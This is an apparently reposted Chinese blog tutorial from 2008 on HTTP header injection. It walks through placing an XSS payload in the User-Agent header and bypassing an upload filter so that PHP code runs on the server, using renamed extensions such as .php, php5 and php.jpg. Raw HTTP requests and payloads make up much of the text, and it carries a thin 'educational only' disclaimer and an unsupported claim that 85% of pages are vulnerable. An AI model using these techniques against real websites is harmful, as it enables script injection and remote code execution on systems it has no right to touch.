HTTP消息头注入

  HTTP消息头注入

这份论文只为教育目的。

我发现我的BLOGSPOT程序非常的糟糕 ,所有的提交都是非常的糟糕,于是我决心做一个好的版本。对不起,我的英语说的不是很好,我会继续努力的,OK,让我们开始这篇简短的文章,你是怎么认为看到一个上传的页面,我认为,也许每个人都会想这是一个非常不错的BUG。跨站上传是一个不错的主意,你也可以把文件重命名为 File.php.jpg。然而我们将要谈论的跨站就是在消息头中,存在这种漏洞的页面是高风险的。

 

关于HTTP消息头 : http://en.wikipedia.org/wiki/List_of_HTTP_headers

 

你要知道我们可以修改HTTP 头应答包,就像一个注射的例子(要理解这个或做一些测试,你需要下载并安装在FireFox Addon中搜索 ”Live HTTP Headers”)运行这个Addon当你输入Google.com回车后,如例子你将看到一些应答包数据,如下:

 

Host: google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

 

你知道有多少站点会在这个页面中打印你的IP和浏览器?很多!,你认为这样正解吗?你可以改变这个消息头和制做一个测试用的XSS(Cross Site Scripting),许多的站点存在这种类型的漏洞而造到攻击,因为WEB管理员毫不知道关于这类的BUG;我记得不是很清楚,但是Astalavista 前几个月也是这种类型的攻击漏洞—HTTP HEADER INJECTION。现在当你拿着HTTP消息头的应答包打开你的Addon Live http headers 单击上面的选项”replay”和修改浏览器/ user agent 如下例:

 

Host: google.com
User-Agent: <script>alert(/xss/)</script>
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

 

当你再次单击”replay” 你会看到结果正是你http 消息头的注入结果,测试中发现85%的页面都存在这样的BUG,如果你要去一个WEB程序中你务必保持警觉。你知道怎么修改这个程序吗?只需要使用 htmlspecialchars();函数。那是关于XSS的利用,但是我对跨站上传的时候制做http header注入感兴趣.

 

让我们看这个HTTP 头的,消息包,是在我上传一个”IMAGE”时的全部代码:

 

Host: www.webiste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://website.com
Content-Type: multipart/form-data; boundary=---------------------------23864205337548
Content-Length: 322


-----------------------------23864205337548

Content-Disposition: form-data; name="userfile"; filename="image.jpg"

Content-Type: image/jpeg



<?php

phpinfo();

?>

-----------------------------23864205337548

Content-Disposition: form-data; name="submit"



Subir imagen

-----------------------------23864205337548--

 

 

这是我在http 消息头中推测出的图片应答包。在这中间你可以看到PHP代码,OK,让我们尝试一些不同的,我们可以去改变这个名称为图片和其他的扩展名如例子:.php(由于一些站点以经把漏洞给补上了,不可以上传PHP扩展名,你可以去尝试

php5,php4,php.jpg,php.png,etc);

 

Content-Disposition: form-data; name="userfile"; filename="image.php"

Content-Type: image/jpeg



<?php

phpinfo();

?>

-----------------------------23864205337548

Content-Disposition: form-data; name="submit"



Subir imagen

-----------------------------23864205337548—

 

当我们发送replay后,让我们看一下HTTP 消息头注入的返回结果;我们得到POST发送的错误,内容是过于长。退出这个错误提示,再次点击发送replay在外面:

 

Content-Length: 322

 

如果上传漏洞存在,你将看到你所上传代码执行后的页面,当你点击这个连接就会看到你假图片.我希望你们在这篇论文里学到新的知识,致意。

 

Author : Psiczn
Website: www.psiczn.uni.cc
Contact: Psiczn@gmail.com
Note : If you are going to post this little paper in some site please put the source and the
author, this paper have copyright.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

posted @ 2008-05-28 17:09  090  阅读(3675)  评论(2编辑  收藏  举报
如有任何的意见和建议,请 E-mail 至 to090@yahoo.com
建议使用 IE 6.0 或 FireFox 2.0 以上版本进行浏览,最佳显示 1024 * 768